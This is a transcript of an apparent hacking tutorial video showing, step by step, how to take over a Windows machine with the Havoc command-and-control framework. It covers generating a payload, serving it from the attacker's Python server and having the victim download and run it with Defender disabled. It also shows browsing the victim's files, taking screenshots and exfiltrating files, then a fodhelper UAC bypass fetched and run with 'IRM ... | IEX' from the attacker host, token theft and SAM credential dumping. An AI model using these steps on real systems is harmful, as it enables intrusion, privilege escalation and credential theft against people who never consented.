Hello guys, back again with another video. So now in this video I'm going to be showing you how we can hack a Windows machine using havoc. But before we start, I have to tell you that hacking is illegal in case you do not have permission, and this video is strictly for educational purposes only. So now I'm going to be showing you how we can hack a Windows machine using havoc. Now first, you need to download havoc inside your Kali Linux. Just go on, open up your terminal, and you are going to say sudo apt install havoc. So if you press enter, just type in your password and your havoc is going to be installed in your system. So I already have this installed within my system. Now I need to start up a server, and at the same time I need to start up the client. So I'm going to clear this and I'm going to divide my terminal into two. So this side I'm going to start my havoc server by just typing havoc server -d, and -d, it is for the default settings. So I'm going to press enter and I'm going to come this side and I'm going to start up my client. So it is better you start up this client with sudo, but it can also start without sudo. So we are going to say sudo havoc client. So here it is just havoc server -d. Here you can just say sudo havoc client. So in case I press enter, I also need to type in my password. So after I press enter, you see we have a profile of Death Star. I'm going to click on connect. So now if we click on connect, you are going to see that here our display is started. Now for me, I have these machines. I'm going to go on and clear this so that everything remains new. Like to you that side, you won't have those machines. So now here, after opening up your havoc client, we need to create up listeners. So to create up listeners, firstly you can hover around. You see when we come to view, you see we have listeners, we have the session view. When we come to attacks, this is where we can create our payloads. We can bring in the scripts, the same thing as Cobalt Strike does. And now to create up our listeners, we are going to come here to view, come to listeners. Now I already have a listener here, but I'm going to create a new one, or I can just come and delete this listener I have here. So I'm going to remove this listener. I no longer have any listener, so come click to add. Then here we are going to provide a name to the listener. Let me just name it GREENET. I'm going to leave it to be as HTTPS. So now if you come here to host, just click on add. Your IP is going to be inserted there. Make sure that is going to be your hello host or the attacker's IP. Now in case you're done, just come down and press OK. So if you press OK, you see you have a listener here. So now after creating our listener, we need to create up a payload which we are going to send to our victim. Creating a payload, just come here to attack and come here to payload. So now the name of the payload is going to be named demon. So here our listener will be set automatically. Just in case you have other listeners, you can just click on the drop down. You'll be able to see them here so that you can choose a suitable listener. So now if we come here to the architecture, we see that this is a 64-bit, but if I click on the drop down, we see that you can also choose a 32-bit. So you can choose any architecture depending to your victim's machine, but in case you are not sure of the machine you are trying to attack, make sure you just go with a 32-bit architecture. So if we come here, we need to create a Windows exe, which is this one. In case you need DLL or shellcode, you can just choose anything you want. So there, I'm going to just scroll down a bit. When we come to sleep technique, I'm going to choose echo as the sleep technique, or I can choose any. I can go for this one, or I can use echo. So if we come down here, you see for injection alloc, we have the system call, but if we scroll down further, we see this one. We have the spawn of the 64 and 32-bit. They are going to be spawned in our notepad exe. So since it is a 64-bit payload we are creating, they will use a 64. So after, you are going to come here and click generate. Now when you click on generate, our source code is going to be compiled. Then later we are going to have an executable. So in a few minutes you will see that we shall be having a executable. Now after around like 3 minutes, our payload has being compiled. Now here they are asking us a location where we can save this payload. So I'm going to just come here to other locations. I want to save it on my desktop. I'm going to come to computer, I come to home, then I come to the user on my machine, then I'm going to choose the desktop. So if I come to the desktop, I'm going to say save. So now our data has been saved to the desktop, and I'm going to click OK. So now I'm going to go to that desktop and I set a Python server, then we share that to our victim. So I'm going to come back and open up a terminal. So open up a new terminal. We are going to go to our desktop. Now here let us set a Python server. So we are going to say Python minus http.server, and I'm going to give it port 80,000. So if I press enter, our server has been started. Now we need to go to our victim's machine, then we download this payload. Now if we come here to our victim's machine, make sure that Windows Defender has been deactivated, unless if you bring in bypassing the Windows antivirus. But for this trick I'm showing you, make sure it is activated. So now if you look, let me go on and display here. If you see my virus protection, the real-time protection, it is off. So in our Windows machine, open up your terminal, let's go to PowerShell and we download this. Now when you see here, I'm inside my PowerShell, so I'm going to download my payload. Downloading the payload, let us use invoke web request, then we provide our server. So it's going to be invoke minus web request, just like that. You are going to say minus URI. So here we provide our domain to the server 192.168. It's going to be .43.103, then port 8000, then slash. Now here the payload is going to be daemon.x64.exe. So let me look at this. Alright, so I'm going to say the output file, we need this to be daemon.exe. So press enter. So let's first come back here. You see that this is our server. Let us first look at our request. We see whether we did not mess up anything. Now in case it is successful, our payload is going to be downloaded on this victim's machine. So invoke web request URI http 192.168.43.103 on port 80,000, and the payload is daemon.exe, and we get our output as daemon.exe. I see it is taking some time to download this. Let us just give it a few minutes. Our download is going to start. So invoke web request. So I see our command is failing. Let me clear this. I do invoke web request again, but I'm going to call this one daemon3. So that is done. So I execute daemon3.exe. So in the case that is done, you see that here we have our machine inside our havoc of daemon3.exe. So if you want to interact with this machine, you can click on it, right click, then you are going to come here to interact, where you can start typing in your commands. But we can also take screenshots of this machine. So in case you want to know commands you can use in havoc, you can just say help and press enter. You will see that we have a couple of commands we can use to our disposal. But still, if I come back here, I'm going to say right click, I'm going to come here to Explorer, then I'm going to click on process list. So if I click on process list, we shall be able to see the processors running on our victim's machine. And here you see everything which is running in the background. The same thing, we can come back and we see if we can take screenshots or we can view screenshots. We can upload data to our victim's machine. At the same time, we can download the data from it. So I'm going to come back here, right click, then I'm going to come to Explorer, then we can come here to File Explorer. So in case you want to move from one location to another on your victim's machine, you can come access to this. So now if you see here, we have daemon 1, daemon 2, and daemon 3, which were the payloads I was trying to download here, but let's try to change the location. I'm going to go to C/users. So now if I press enter, in case you have other users on your victim's machine, you'll be able to see the users here. Now let's say you just want to go to local disk C, you can just say C like that, the full architecture. So now if you see here, we have different files present in this location. So I'm going to just come here, let's say I'm going to come here to boot mgr. I'm going to right click on it, I'm going to set download. So now if you see here, I've downloaded, or I've clicked to download this file. So where can I check the files which are downloaded? But I'm going to first come and click on this one where I did to interact with our machine. And in case I want to take screenshots, I can just type screenshot here, and if I press enter, we shall take a screenshot of our victim 2's machine. Then later we are going to go to view, then we view that screenshot. Now if you see here, the command is successful. So come here to view, then you are going to come here to load. So if you come to load, you see that here we have our screenshot. This is the screenshot of our victim 2's machine where we last left it when downloading the payload. But when you see up here, we can also see we have the download. So I'm going to come here and click to the downloads. You see this is the file which I downloaded earlier. So we can turn back to screenshots. We find this all in our load. So you just come here to load. So we can also change the view of our machine here. You can just come here to view, and let's say you want the graph view. You come to session view and graph view. You see everything just like this. Now this machine, we do not have access to the administrator. I'm going to just come and close all of this. So if we are here in our command, now here I'm going to say shell, then I'm going to say who am I /priv. So when I say who am I /priv, we are going to check whether this user is present or has the super user privileges, where we can pivot or we can dump files we need from this machine. So when you see we don't have anything called for super user. Now I have a script here. Now if we come here to our GitHub, there is this script I found online for bypassing the USC using for the helper. So I'm going to copy this and I'm going to create another script in this location where my server is. So I'm going to just open up another terminal and I'm going to say cd desktop. Then here I'm going to create a file, then I paste my file inside. So I'm going to call this one bypass usc.ps1 for PowerShell. So click enter, then I'm going to paste everything here. So I need to customize this script. Now when you try to see here, we have the C users, user1 downloads, and we also have daemon.exe. Now this is a location, or this is our payload which is going to be executed. So now if we come to our havoc, if you remember that we made the payload to be downloaded in our downloads, and I named our payload as daemon 3. So I need to customize this script. So I'm going to come here and I'm going to remove this, and I call them daemon 3, and our user in our victim's machine is user1. Make sure that you change this depending to what you have in your system. Now for the helper, it's going to create or to add more data in our registry so that we are provided with the NT authority. So in case you're done, we are going to save this and exit. So now we need to start this or to access this on our victim's machine. So I'm going to come back here to havoc, Then I'm going to use PowerShell to execute this command. So I'm going to come here and I'm going to say PowerShell. Now here in our attacker's machine, you see that we still have our server and it is on the desktop, where I also created this file on my desktop for bypass usc.ps1. So I'm going to come back here. Now here I'm going to say IRM, then I'm going to provide the link to my server 192.168.43, then .103. I provide my port, which is 8000. Then I'm going to say bypass usc.ps1. Then here just provide a pipe and just say IEX. So now here they are going to run this script and it will be executed right away. Now in case it is done here, we shall be able to get another machine having the NT authority. So press enter. So let us just wait and see whether this script will execute and we get access to another machine. So let me just come and change the view to our table view so that we shall be able to see our machine very easily. So let me just wait for a few minutes. We see whether we shall be able to get access to the second machine. So now after executing that script, you see that here registry keys have been added and here we have another access to this user one, but this time it has the lightning signs on it. When I turn to graphical view, you see that we have this one and we also have this one with the electricity signs or lightning. So this one has the super user privilege. So I'm going to right click on this and I'm going to say interact. So since I have, or I can come here and say shell, then I can say who am I, then /priv. We see whether we have the privileges. So in case you have the privileges, we can go on further and we dump the SAM file. We can dump the tokens. Sorry, the command is who am I missed here later. I was telling you that we can dump passwords from this machine and we can proceed with other attacks. Now when you try to see here, I have more privileges to this machine. So let me see if I set token, we shall be able. Now in case you want to know how to use a certain command here, you can just say help and you provide a command for token. So now when I say help token, you see here they are showing us the usage. You can just type token and you provide a sub command and we have our commands here. So I see we have the remove, revert, get, enable privileges. Then we have the impersonate, we have the steal, we have the list. So with the list, it will list stolen tokens. Now here finds tokens that can be stolen. Now I can just say token. I'm going to come here and set token, get UID. We see what will be brought back. So now for the UID, it is user and also user one. Now we are running this as admin. So there is also another command which is called sumdump, but also we can say help sumdump and we see how we can use this command. Now here you provide a folder where your SAM file is located. Let's try to dump this. So I'm going to say sumdump. Then we find the SAM file in C, Windows, then system32. Then we go to config. Let me press enter. Now here we shall be able to dump our SAM. Let's just give it a few seconds. Now when you try to see here, we see that data has been exported inside our some files, and here it is kept in security. I see here we have Samantha systematic. Let's come back here to view. I'm going to go to loot. We see that if we did not get more data here, but still when you try to see here, our data has been backed up. So now you see that here we've hacked a Windows machine. Then we've got our administrator or administrative, which is the privilege escalation on this machine using for the helper. Subscribe to my channel, give a thumbs up, have a great day, peace.